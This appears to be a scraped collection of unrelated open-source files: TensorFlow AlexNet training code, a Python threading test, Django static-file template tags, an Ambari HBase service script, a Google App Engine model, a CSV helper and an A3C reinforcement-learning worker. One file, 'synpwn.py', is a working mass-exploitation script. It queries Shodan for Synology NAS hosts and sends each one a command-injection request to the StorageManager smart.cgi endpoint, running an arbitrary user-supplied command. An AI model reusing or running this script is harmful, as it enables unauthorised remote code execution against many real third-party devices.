relu4 = tf.nn.relu(tf.nn.bias_add(conv4, convolution_biases4))
print (relu4.get_shape())
conv5 = tf.nn.conv2d(input=relu4,
strides=[1, 1, 1, 1],
padding="SAME",
filter=convolution_weights5)
print (conv5.get_shape())
relu5 = tf.nn.relu(tf.nn.bias_add(conv5, convolution_biases5))
print (relu5.get_shape())
pool5 = tf.nn.max_pool(value=relu5,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding="VALID")
fc = tf.reshape(pool5, [-1, fc1_weights.get_shape().as_list()[0]])
# fc = batch_normalization(fc, depth=fc.get_shape()[-1], phase_train=flag)
hidden_1 = tf.matmul(fc, fc1_weights) + fc1_biases
hidden_1_relu = tf.nn.relu(hidden_1)
# hidden_1_relu_bn = batch_norm(hidden_1_relu, flag)
if flag:
hidden_1_relu = tf.nn.dropout(hidden_1_relu, keep_prob=DROP_OUT)
hidden_2 = tf.matmul(a=hidden_1_relu, b=fc2_weights) + fc2_biases
hidden_2_relu = tf.nn.relu(hidden_2)
hidden_2_relu_bn = batch_norm(hidden_2_relu, flag)
if flag:
hidden_2_relu_bn = tf.nn.dropout(hidden_2_relu_bn, keep_prob=DROP_OUT)
hidden_3 = tf.matmul(hidden_2_relu_bn, fc3_weights)
network = hidden_3
return network
logits = forward(feed_train_data, True)
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, feed_train_label))
regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases) +
tf.nn.l2_loss(fc3_weights))
loss += REGULAR * regularizers
train_predict = tf.nn.softmax(logits)
eval_logits = forward(feed_eval_data, False)
eval_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(eval_logits, feed_eval_label))
eval_predict = tf.nn.softmax(eval_logits)
TENSOR_GLOBAL_STEP = tf.Variable(0, dtype=tf.int64)
learning_rate = tf.train.exponential_decay(
LEARNING_RATE, # Base learning rate.
TENSOR_GLOBAL_STEP, # Current index into the dataset.
DECAY_STEPS, # Decay step.
DECAY_RATE, # Decay rate.
staircase=True)
# optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss=loss)
# optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate, decay=DECAY_RATE).minimize(loss)
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,
momentum=MOMENTUM).minimize(loss=loss,
global_step=TENSOR_GLOBAL_STEP)
# optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
# optimizer = tf.train.AdagradOptimizer(learning_rate=learning_rate).minimize(loss=eval_loss)
# optimizer = tf.train.FtrlOptimizer(learning_rate=learning_rate).minimize(loss)
# optimizer = tf.train.ProximalGradientDescentOptimizer(learning_rate).minimize(loss)
with tf.Session() as sess:
print ("INIT.")
print (SEED)
init = tf.global_variables_initializer()
sess.run(init)
tf.summary.scalar(name="learning", tensor=learning_rate)
tf.summary.histogram(name="learning", values=learning_rate)
tf.summary.scalar(name="regularizers", tensor=regularizers * REGULAR)
tf.summary.histogram(name="regularizers", values=regularizers * REGULAR)
tf.summary.scalar(name="loss", tensor=loss - REGULAR * regularizers)
tf.summary.histogram(name="loss", values=loss - REGULAR * regularizers)
tf.summary.scalar(name="eval_loss", tensor=eval_loss)
tf.summary.histogram(name="eval_loss", values=eval_loss)
merge_op = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(logdir="./log/train/", graph=sess.graph)
valid_writer = tf.summary.FileWriter(logdir="./log/valid")
limit = TRAIN_SIZE // BATCH_SIZE + 1
limit_eval = EVAL_SIZE // BATCH_SIZE + 1
acc_loss = 1000
saver = tf.train.Saver()
while acc_loss > 0.2:
for step in range(GLOBAL_STEP):
if step % REPORT_CONTROL == 0:
ave_eval_loss = 0.0
ave_eval_acc = 0.0
print ("STEP %d " % step)
print ("------------------------------------>")
for batch in range(limit_eval):
print ("EVAL BATCH SIZE FOR %d " % batch)
if batch == limit_eval - 1:
start = batch * BATCH_SIZE
end = EVAL_SIZE
if end - start == 0:
continue
else:
start = batch * BATCH_SIZE
end = start + BATCH_SIZE
input = eval_data[start:end]
input_label = eval_label[start:end]
feed_dict = {feed_eval_data: input,
feed_eval_label: input_label}
_eval_predict, _eval_loss, _regularizers = sess.run(
[eval_predict, eval_loss, regularizers],
feed_dict=feed_dict)
media = np.argmax(_eval_predict, 1)
array = np.argmax(input_label, 1)
acc_sum = np.sum(media == array)
accurate = (acc_sum / float(end - start))
acc_loss = _eval_loss
_regularizers *= REGULAR
print (media)
print (array)
ave_eval_loss += _eval_loss
ave_eval_acc += accurate
print ("accurate %f " % accurate)
print ("loss %s " % str(_eval_loss))
print ("regularizers %f " % _regularizers)
print ("------------------------------------>")
if end == EVAL_SIZE:
ave_eval_loss = ave_eval_loss / (batch)
ave_eval_acc = ave_eval_acc / (batch)
print ("average eval acc %f " % ave_eval_acc)
print ("average eval loss %f " % ave_eval_loss)
if ave_eval_loss > 0:
if ave_eval_acc >= 0.95 or ave_eval_loss <= 0.15:
model = "alexnet-eval-acc-" + str(ave_eval_acc) + "-loss-" + str(
ave_eval_loss) + ".model"
path = saver.save(sess, model)
print ("save model for %s " % path)
ave_train_loss = 0.0
ave_train_acc = 0.0
for batch in xrange(limit):
if batch == limit - 1:
start = batch * BATCH_SIZE
end = TRAIN_SIZE
if end - start == 0:
continue
else:
start = batch * BATCH_SIZE
end = start + BATCH_SIZE
input = train_data[start:end]
input_label = train_label[start:end]
feed_dict = {feed_train_data: input,
feed_train_label: input_label}
_loss, _optimizer, _train_predict, _regular, _learn_rate = sess.run(
[loss, optimizer, train_predict, regularizers, learning_rate],
feed_dict=feed_dict)
_adjust_regular = _regular * np.float16(REGULAR)
media = np.argmax(_train_predict, 1)
array = np.argmax(input_label, 1)
temp = np.sum(media == array)
if step % REPORT_CONTROL == 0:
accurate = (temp / float(end - start))
print ("*************************>")
print ("batch for %d " % batch)
print ("loss %f" % _loss)
print ("regular %f" % _adjust_regular)
print ("accurate %f " % accurate)
print ("learn_rate %f " % _learn_rate)
print ("*************************<")
ave_train_loss += _loss - float(_adjust_regular)
ave_train_acc += accurate
if end == TRAIN_SIZE:
ave_train_loss = ave_train_loss / (batch + 1)
ave_train_acc = ave_train_acc / (batch + 1)
print ("average train acc : %f " % ave_train_acc)
print ("average train loss : %f " % ave_train_loss)
if ave_train_loss > 0:
if ave_train_acc >= 0.95 or ave_train_loss <= 0.15:
model = "alexnet-train-acc-" + str(ave_train_acc) + "-loss-" + str(
ave_train_loss) + ".ckpt"
path = saver.save(sess, model)
print ("save model for %s " % path)
print ("train over.")
return
if '__main__' == __name__:
tf.app.run()
|
ElvisLouis/code
|
work/ML/tensorflow/separa/scatter_alexnet.py
|
Python
|
gpl-2.0
| 17,960
|
import threading
import time
def print_i(num):
time.sleep(1)
for i in range(0, num):
print("thread #: ", threading.active_count())
print(num)
for i in range(0, 100):
thread = threading.Thread(target=print_i(i))
thread.setDaemon(True)
thread.start()
|
billlai95/bilimining
|
biligrab/ThreadingTest.py
|
Python
|
apache-2.0
| 288
|
#!/usr/bin/env python3
# Author: LukeBob
#
# Requires: argparse, shodan, requests pip install them if needed.
# Run with: python3 synPwn.py --key <Shodan API Key> --cmd "<Command to try and execute>"
#
# python3 script for testing the (Synology StorageManager 5.2 - Root Remote Command Execution) exploit found by, (Weibo: SecuriTeam_SSD Twitter: @SecuriTeam_SSD)
# Uses the shodan library to find the targets running synology and runs specified command given in --cmd param
# use, "python3 synpwn.py" -h ,for more help
# For more information on the exploit visit: https://www.exploit-db.com/exploits/43190/
#
# Note THIS SCRIPT CAN GET YOU IN ALOT OF TROUBLE, PROBABLY NOT WORTH THE HASTLE, ANYTHING YOU DO WITH THIS SCRIPT IS ON YOU'R BEHALF,
# AND YOUR'S ALONE!
#
# READ ^^^
import requests
import argparse
import shodan
parser = argparse.ArgumentParser(description="SynPwn, run remote code on Servers running 'Synology StorageManager 5.2'", epilog='Author: (Lukebob)')
parser.add_argument("--key", help='Shodan key')
parser.add_argument("--cmd", help='Command to run on system, if spaces in command wrap the command in quotes')
args = parser.parse_args()
## cloulors
class Color():
@staticmethod
def red(str):
return("\033[91m" + str + "\033[0m")
@staticmethod
def green(str):
return("\033[92m" + str + "\033[0m")
@staticmethod
def yellow(str):
return("\033[93m" + str + "\033[0m")
@staticmethod
def blue(str):
return("\033[94m" + str + "\033[0m")
## Creates New Shodan Api Object
def make_api(key):
try:
if len(key) > 1:
api = shodan.Shodan(key)
api.info()
else:
print(Color.red("[+] Error:")+" Please enter valid Api Key")
except shodan.exception.APIError as e:
print('[+] Error: %s' % e)
exit(0)
return(api)
## try's to run command on the target
def exploit(target):
try:
url = ("http://{0}/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda'{1}''".format(target, args.cmd))
r=requests.get(url)
stat = r.status_code
return(stat)
except Exception as e:
print(Color.red("[+] Error: ")+" {0}".format(e))
pass
## itterates through targets printing vulnerable/invulnerable ip,hostname,countryname
def search(api):
try:
results = api.search("Synology port:80")
except shodan.APIError as e:
print(Color.red("[+] Error: ")+"{0}".format(e))
exit(0)
for result in results['matches']:
country = result['location']['country_name']
hostname = result['hostnames']
target = result['ip_str']
result = exploit(target)
if result == "200":
print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, Color.red(args.cmd), Color.green("Vulnerable")))
elif result != "200":
print("""
---------------------------------------------------------------------------------------
[Target {0}]\t[Hostname {1}]\t[Country {2}]\t[Command {3}]\t[{4}]
---------------------------------------------------------------------------------------
""".format(Color.green(target), hostname, Color.red(args.cmd), Color.red("Not Vulnerable")))
def main():
if args.cmd and args.key:
api = make_api(args.key)
search(api)
else:
parser.print_help()
if __name__ == '__main__':
main()
|
LukeBob/bobstools-py
|
synpwn.py
|
Python
|
mit
| 3,694
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management import *
def hbase_service(
name,
action = 'start'): # 'start' or 'stop' or 'status'
import params
role = name
cmd = format("{daemon_script} --config {hbase_conf_dir}")
pid_file = format("{hbase_pid_dir}/hbase-{hbase_user}-{role}.pid")
no_op_test = format("ls {pid_file} >/dev/null 2>&1 && ps `cat {pid_file}` >/dev/null 2>&1")
if action == 'start':
daemon_cmd = format("{cmd} start {role}")
Execute ( daemon_cmd,
not_if = no_op_test,
user = params.hbase_user
)
elif action == 'stop':
daemon_cmd = format("{cmd} stop {role}")
Execute ( daemon_cmd,
user = params.hbase_user,
# BUGFIX: hbase regionserver sometimes hangs when nn is in safemode
timeout = params.hbase_regionserver_shutdown_timeout,
on_timeout = format("{no_op_test} && {sudo} -H -E kill -9 `{sudo} cat {pid_file}`")
)
File(pid_file,
action = "delete",
)
|
alexryndin/ambari
|
ambari-server/src/main/resources/common-services/AMBARI_METRICS/0.1.0/package/scripts/hbase_service.py
|
Python
|
apache-2.0
| 1,796
|
from django import template
from django.apps import apps
from django.utils.encoding import iri_to_uri
from django.utils.six.moves.urllib.parse import urljoin
register = template.Library()
class PrefixNode(template.Node):
def __repr__(self):
return "<PrefixNode for %r>" % self.name
def __init__(self, varname=None, name=None):
if name is None:
raise template.TemplateSyntaxError(
"Prefix nodes must be given a name to return.")
self.varname = varname
self.name = name
@classmethod
def handle_token(cls, parser, token, name):
"""
Class method to parse prefix node and return a Node.
"""
# token.split_contents() isn't useful here because tags using this method don't accept variable as arguments
tokens = token.contents.split()
if len(tokens) > 1 and tokens[1] != 'as':
raise template.TemplateSyntaxError(
"First argument in '%s' must be 'as'" % tokens[0])
if len(tokens) > 1:
varname = tokens[2]
else:
varname = None
return cls(varname, name)
@classmethod
def handle_simple(cls, name):
try:
from django.conf import settings
except ImportError:
prefix = ''
else:
prefix = iri_to_uri(getattr(settings, name, ''))
return prefix
def render(self, context):
prefix = self.handle_simple(self.name)
if self.varname is None:
return prefix
context[self.varname] = prefix
return ''
@register.tag
def get_static_prefix(parser, token):
"""
Populates a template variable with the static prefix,
``settings.STATIC_URL``.
Usage::
{% get_static_prefix [as varname] %}
Examples::
{% get_static_prefix %}
{% get_static_prefix as static_prefix %}
"""
return PrefixNode.handle_token(parser, token, "STATIC_URL")
@register.tag
def get_media_prefix(parser, token):
"""
Populates a template variable with the media prefix,
``settings.MEDIA_URL``.
Usage::
{% get_media_prefix [as varname] %}
Examples::
{% get_media_prefix %}
{% get_media_prefix as media_prefix %}
"""
return PrefixNode.handle_token(parser, token, "MEDIA_URL")
class StaticNode(template.Node):
def __init__(self, varname=None, path=None):
if path is None:
raise template.TemplateSyntaxError(
"Static template nodes must be given a path to return.")
self.path = path
self.varname = varname
def url(self, context):
path = self.path.resolve(context)
return self.handle_simple(path)
def render(self, context):
url = self.url(context)
if self.varname is None:
return url
context[self.varname] = url
return ''
@classmethod
def handle_simple(cls, path):
if apps.is_installed('django.contrib.staticfiles'):
from django.contrib.staticfiles.storage import staticfiles_storage
return staticfiles_storage.url(path)
else:
return urljoin(PrefixNode.handle_simple("STATIC_URL"), path)
@classmethod
def handle_token(cls, parser, token):
"""
Class method to parse prefix node and return a Node.
"""
bits = token.split_contents()
if len(bits) < 2:
raise template.TemplateSyntaxError(
"'%s' takes at least one argument (path to file)" % bits[0])
path = parser.compile_filter(bits[1])
if len(bits) >= 2 and bits[-2] == 'as':
varname = bits[3]
else:
varname = None
return cls(varname, path)
@register.tag('static')
def do_static(parser, token):
"""
Joins the given path with the STATIC_URL setting.
Usage::
{% static path [as varname] %}
Examples::
{% static "myapp/css/base.css" %}
{% static variable_with_path %}
{% static "myapp/css/base.css" as admin_base_css %}
{% static variable_with_path as varname %}
"""
return StaticNode.handle_token(parser, token)
def static(path):
"""
Given a relative path to a static asset, return the absolute path to the
asset.
"""
return StaticNode.handle_simple(path)
|
KrzysztofStachanczyk/Sensors-WWW-website
|
www/env/lib/python2.7/site-packages/django/templatetags/static.py
|
Python
|
gpl-3.0
| 4,391
|
from google.appengine.ext import db
from datetime import datetime
class People(db.Model):
first_name = db.StringProperty()
last_name = db.StringProperty()
email_addr = db.StringProperty()
acq_source = db.StringProperty()
fb_uid = db.StringProperty()
ss_uid = db.StringProperty()
dob = db.StringProperty()
gender = db.StringProperty()
createdon = db.DateTimeProperty()
last_login = db.DateTimeProperty()
passwd = db.StringProperty()
def to_dict(self):
our_dict = self.__dict__.copy()['_entity']
our_dict['id'] = self.key().id()
our_dict['createdon'] = self.createdon.strftime('%d %b %Y') if self.createdon else ''
our_dict['last_login'] = self.last_login.strftime('%d %b %Y') if self.last_login else ''
if 'passwd' in our_dict:
del our_dict['passwd']
return our_dict
def update(self, new_values):
for p in new_values:
self.__setattr__(p, new_values.get(p))
return self
|
mathurakshay/gae-social-login
|
models/people.py
|
Python
|
unlicense
| 975
|
#See also: http://www.doughellmann.com/PyMOTW/csv/
import sys
import csv
UNKNOWN_TEXT_IMT = 'text/unknown'
def readcsv(text):
sniffer = csv.Sniffer()
data = []
#Heuristic: is this really a CSV? Sniffer is pretty lax
sanity_check_length = None
try:
dialect = csv.Sniffer().sniff(text[:2048])
sniff_success = True
except (KeyboardInterrupt, SystemExit):
raise
except Exception, e:
sniff_success = False
lines = text.splitlines()
#print >> sys.stderr, lines[:2], dialect.__dict__
if sniff_success and sniffer.has_header(lines[3]):
reader = csv.DictReader(lines, dialect=dialect)
for count, row in enumerate(reader):
#print >> sys.stderr, row
if sanity_check_length is None:
sanity_check_length = len(row)
elif not(row):
continue
elif len(row) != sanity_check_length:
print 1, (len(row),sanity_check_length)
data = []
imt = UNKNOWN_TEXT_IMT
break
#data.append(row)
data.append(dict(((k or '').decode('iso-8859-1'), val.decode('iso-8859-1')) for (k, val) in row.iteritems()))
data[-1]['label'] = '_' + str(count)
data[-1]['id'] = '_' + str(count)
#for line in islice(text.split(dialect.lineterminator), 0, 2):
# if len(line.split(dialect.delimiter))
elif sniff_success:
reader = csv.reader(lines, dialect=dialect)
#reader = csv.reader(text, delimiter=',', lineterminator='\n')
for count, row in enumerate(reader):
#print >> sys.stderr, row
if sanity_check_length is None:
sanity_check_length = len(row)
elif not(row):
continue
elif len(row) != sanity_check_length:
print 2, (len(row),sanity_check_length)
data = []
imt = UNKNOWN_TEXT_IMT
break
data.append(dict((u'field%i'%i, val.decode('iso-8859-1')) for (i, val) in enumerate(row)))
data[-1]['label'] = '_' + str(count)
data[-1]['id'] = '_' + str(count)
return data
#
def compare_csv_dialects(a, b, attributes=[name for name in dir(csv.Dialect) if not name.startswith("_")]):
#Pretty obvious, but nevertheless stolen from http://groups.google.com/group/comp.lang.python/browse_thread/thread/9de18eeabd38faff
"""
>>> d = csv.Sniffer().sniff("1,2,3")
>>> eq(d, csv.Sniffer().sniff("3,4,5"))
True
>>> eq(d, csv.Sniffer().sniff("'3','4','5'"))
False
>>> eq(d, csv.Sniffer().sniff("3;4;5"))
False
>>> eq(d, csv.Sniffer().sniff("3,4,' 5'"))
True
"""
return all(getattr(a, n, None) == getattr(b, n, None) for n in attributes)
|
zepheira/zenpub
|
lib/csvhelper.py
|
Python
|
apache-2.0
| 2,836
|
import frappe
import apt
|
StrellaGroup/strella-devops
|
fabric/fabfile/__init__.py
|
Python
|
mit
| 25
|
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
import tensorflow.contrib.rnn as rnn
import scipy.signal
import ucv_utils
from command import Commander
from schedule import Schedule
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def update_target_graph(from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var, to_var in zip(from_vars, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
class ACNetwork:
""" Actor-Critic Network Class """
def __init__(self, scope, trainer, config, start_step):
schedule = Schedule(config)
# Graph Definition
with tf.variable_scope(scope):
# input image
self.inputs = tf.placeholder(shape=[None]+config.STATE_SHAPE, dtype=tf.float32, name='input_image')
# one-hot depth labels for each depth pixel
self.aux_depth_labels = [tf.placeholder(shape=[None] + [8], dtype=tf.float32, name='depth_px_{}'.format(i)) for i in range(4*16)]
# sin(heading_error)
self.direction_input = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='heading_error_input')
# angular velocity state
self.velocity_state = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='velocity_state')
# previous action
self.prev_action = tf.placeholder(shape=[None, config.ACTIONS], dtype=tf.float32, name='previous_action')
# previous reward
self.prev_reward = tf.placeholder(shape=[None, 1], dtype=tf.float32, name='previous_reward')
# entropy reward scheduling parameter
self.entropy_parameter = schedule.entropy(start_step)
print('Entropy parameter set to {}'.format(schedule.entropy(start_step)))
# convolutional encoder
self.conv1 = slim.conv2d(inputs=self.inputs,
num_outputs=16,
kernel_size=[8, 8],
stride=[4, 4],
padding='VALID',
activation_fn=tf.nn.elu)
self.conv2 = slim.conv2d(inputs=self.conv1,
num_outputs=32,
kernel_size=[4, 4],
stride=[2, 2],
padding='VALID',
activation_fn=tf.nn.elu)
hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu)
# Concatenating additional inputs with CNN outputs
layers_to_concat = [hidden]
if config.GOAL_ON:
layers_to_concat.append(self.direction_input)
if config.ACCELERATION_ACTIONS:
layers_to_concat.append(self.velocity_state)
if config.PREV_REWARD_ON:
layers_to_concat.append(self.prev_reward)
if config.PREV_ACTION_ON:
layers_to_concat.append(self.prev_action)
concatenated = tf.concat(layers_to_concat, axis=1)
rnn_in = tf.expand_dims(concatenated, [0])
# LSTM layer
lstm_cell = rnn.BasicLSTMCell(256, state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
step_size = tf.shape(self.inputs)[:1]
self.state_in = rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = \
tf.nn.dynamic_rnn(lstm_cell,
rnn_in,
sequence_length=step_size,
initial_state=self.state_in,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
# output layers
self.policy = slim.fully_connected(rnn_out, config.ACTIONS,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None, scope='policy_out')
self.value = slim.fully_connected(rnn_out, 1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None, scope='value_out')
# auxiliary outputs
if config.AUX_TASK_D2:
self.aux_depth2_hidden = slim.fully_connected(rnn_out, 128, activation_fn=tf.nn.elu)
self.aux_depth2_logits = [
slim.fully_connected(self.aux_depth2_hidden, 8, activation_fn=None) # , scope='d2_logits'
for i in range(4*16)]
# loss functions
if scope != 'global':
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions, config.ACTIONS, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
self.entropy = -tf.reduce_sum(self.policy * tf.log(tf.clip_by_value(self.policy, 1e-20, 1)))
self.policy_loss = -tf.reduce_sum(tf.log(tf.clip_by_value(self.responsible_outputs, 1e-20, 1))
* self.advantages)
loss_array = [0.5 * self.value_loss, self.entropy_parameter * self.entropy, self.policy_loss] # -0.01
# Auxiliary Loss Functions
if config.AUX_TASK_D2:
self.aux_depth2_losses = [tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
labels=self.aux_depth_labels[i], logits=self.aux_depth2_logits[i])) for i in range(4 * 16)]
self.aux_depth2_loss = tf.add_n(self.aux_depth2_losses)
loss_array.append(1.0 * self.aux_depth2_loss)
self.loss = tf.add_n(loss_array)
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope)
self.gradients = tf.gradients(self.loss, local_vars)
self.var_norms = tf.global_norm(local_vars)
grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
if trainer is not None:
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
class Worker:
""" A3C agent, optionally augmented with aux tasks """
def __init__(self, name, trainer, global_episodes, global_steps, logger_steps, config, start_step):
self.name = 'worker_' + str(name)
self.number = name
self.config = config
self.model_path = self.config.MODEL_PATH
self.trainer = trainer
self.global_episodes = global_episodes
self.increment_episodes = global_episodes.assign_add(1)
self.global_steps = global_steps
self.local_steps = 0
self.increment_steps = global_steps.assign_add(1)
self.cumulative_steps = logger_steps
self.episode_rewards = []
self.episode_lengths = []
self.episode_mean_values = []
self.summary_writer = tf.summary.FileWriter('train' + str(self.number), graph=tf.get_default_graph())
self.env = Commander(self.number, self.config, self.name) # RL training (the 'game')
self.local_AC = ACNetwork(self.name, trainer, self.config, start_step)
self.update_local_ops = update_target_graph('global', self.name)
self.actions = self.env.action_space
self.batch_rnn_state_init = None
self.last_model_save_steps = 0
self.last_log_writing_steps = 0
def train(self, rollout, bootstrap_value, gamma, lmbda, sess):
""" Actor-Critic + Aux task training """
# load an episode of experiences
rollout = np.array(rollout)
observations = rollout[:, 0]
actions = rollout[:, 1]
rewards = rollout[:, 2]
next_observations = rollout[:, 3]
values = rollout[:, 5]
if self.config.AUX_TASK_D2:
aux_depth = rollout[:, 6]
if self.config.GOAL_ON:
goal_vector = np.vstack(gv for gv in rollout[:, -2]) # TODO: this implementation does not allow using goal vector without acceleration actions...
if self.config.ACCELERATION_ACTIONS:
velocity_state = np.vstack(vs for vs in rollout[:, -1])
identity = np.eye(8)
# calculating discounted return for each step
rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = discount(rewards_plus, gamma)[:-1]
value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * value_plus[1:] - value_plus[:-1] # Advantage, approximated by TD error
advantages = discount(advantages, lmbda)
rnn_state = self.local_AC.state_init
feed_dict = {self.local_AC.target_v: discounted_rewards,
self.local_AC.inputs: np.vstack(np.expand_dims(obs, 0) for obs in observations),
self.local_AC.actions: actions,
self.local_AC.advantages: advantages,
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]
}
ops_for_run = [self.local_AC.value_loss,
self.local_AC.policy_loss,
self.local_AC.entropy,
self.local_AC.grad_norms,
self.local_AC.var_norms,
self.local_AC.apply_grads]
# if training with auxiliary tasks, augment feed_dict and loss ops
if self.config.AUX_TASK_D2:
depth_list = [np.vstack(identity[batch, :] for batch in px) for px in np.transpose(aux_depth)]
depth_labels = np.swapaxes(np.array(depth_list), 0, 1)
feed_dict.update({self.local_AC.aux_depth_labels[px]: depth_labels[px] for px in range(4*16)})
ops_for_run.insert(3, self.local_AC.aux_depth2_loss)
if self.config.GOAL_ON:
feed_dict.update({self.local_AC.direction_input: goal_vector})
if self.config.ACCELERATION_ACTIONS:
feed_dict.update({self.local_AC.velocity_state: velocity_state})
if self.config.PREV_ACTION_ON:
prev_action = np.zeros((1, self.config.ACTIONS), dtype=np.float32)
for i in range(len(actions)-1):
prev_action = np.vstack((prev_action, np.eye(self.config.ACTIONS, dtype=np.float32)[actions[i]][:]))
feed_dict.update({self.local_AC.prev_action: prev_action})
if self.config.PREV_REWARD_ON:
prev_reward = np.zeros((1, 1), dtype=float)
for i in range(len(rewards) - 1):
prev_reward = np.vstack((prev_reward, rewards[i]))
feed_dict.update({self.local_AC.prev_reward: prev_reward})
# calculate losses and gradients
results = sess.run(ops_for_run, feed_dict=feed_dict)
v_l, p_l, e_l = results[:3]
depth_losses = results[3]
g_n, v_n = results[-3:-1]
self.batch_rnn_state_init = results[-1]
return v_l / len(rollout), p_l / len(rollout), e_l / len(rollout), g_n, v_n, depth_losses/len(rollout)
def work(self, sess, coord, saver):
""" Target function for Thread.run(), policy evaluation on episodes + training """
episode_count = sess.run(self.global_episodes)
print('Starting worker ' + str(self.number))
with sess.as_default(), sess.graph.as_default():
# Training Loop
while not coord.should_stop():
# initializing episode
sess.run(self.update_local_ops)
episode_buffer = []
episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
previous_reward = np.expand_dims(np.expand_dims(0.0, 0), 0) # np.zeros([1, 1], dtype=float)
previous_action = np.zeros([1, self.config.ACTIONS], dtype=np.float32)
self.env.new_episode()
s = self.env.get_observation()
episode_frames.append(s)
if self.config.AUX_TASK_D2:
aux_depth = np.expand_dims(self.env.get_observation(viewmode='depth').flatten(), 0)
if self.config.GOAL_ON:
goal_direction = self.env.get_goal_direction()
if self.config.ACCELERATION_ACTIONS:
velocity_state = self.env.get_velocity_state()
rnn_state = self.local_AC.state_init
self.batch_rnn_state_init = rnn_state
# Episode Loop
while self.env.is_episode_finished() is False:
# running network for action selection
feed_dict = {self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]}
if self.config.GOAL_ON:
feed_dict.update({self.local_AC.direction_input: goal_direction})
if self.config.ACCELERATION_ACTIONS:
feed_dict.update({self.local_AC.velocity_state: velocity_state})
if self.config.PREV_ACTION_ON:
feed_dict.update({self.local_AC.prev_action: previous_action})
if self.config.PREV_REWARD_ON:
feed_dict.update({self.local_AC.prev_reward: previous_reward})
a_dist, v, rnn_state = sess.run([self.local_AC.policy,
self.local_AC.value,
self.local_AC.state_out],
feed_dict=feed_dict)
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(np.equal(a_dist, a))
previous_action = np.expand_dims(np.eye(self.config.ACTIONS)[a][:], 0) # onehot previous action
self.cumulative_steps.increment()
sess.run(self.increment_steps)
self.local_steps += 1
# Act and receive reward from th environment
r = self.env.action(self.actions[a])
d = self.env.is_episode_finished()
previous_reward = np.expand_dims(np.expand_dims(r, 0), 0)
if d is False:
s1 = self.env.get_observation()
episode_frames.append(s1)
else:
s1 = s
episode_experiences = [s, a, r, s1, d, v[0, 0]]
if self.config.AUX_TASK_D2:
aux_depth = np.expand_dims(self.env.get_observation(viewmode='depth').flatten(), 0)
episode_experiences.append(aux_depth)
if self.config.GOAL_ON:
goal_direction = self.env.get_goal_direction()
episode_experiences.append(goal_direction)
if self.config.ACCELERATION_ACTIONS:
velocity_state = self.env.get_velocity_state()
episode_experiences.append(velocity_state)
episode_buffer.append(episode_experiences)
episode_values.append(v[0, 0])
episode_reward += r
s = s1
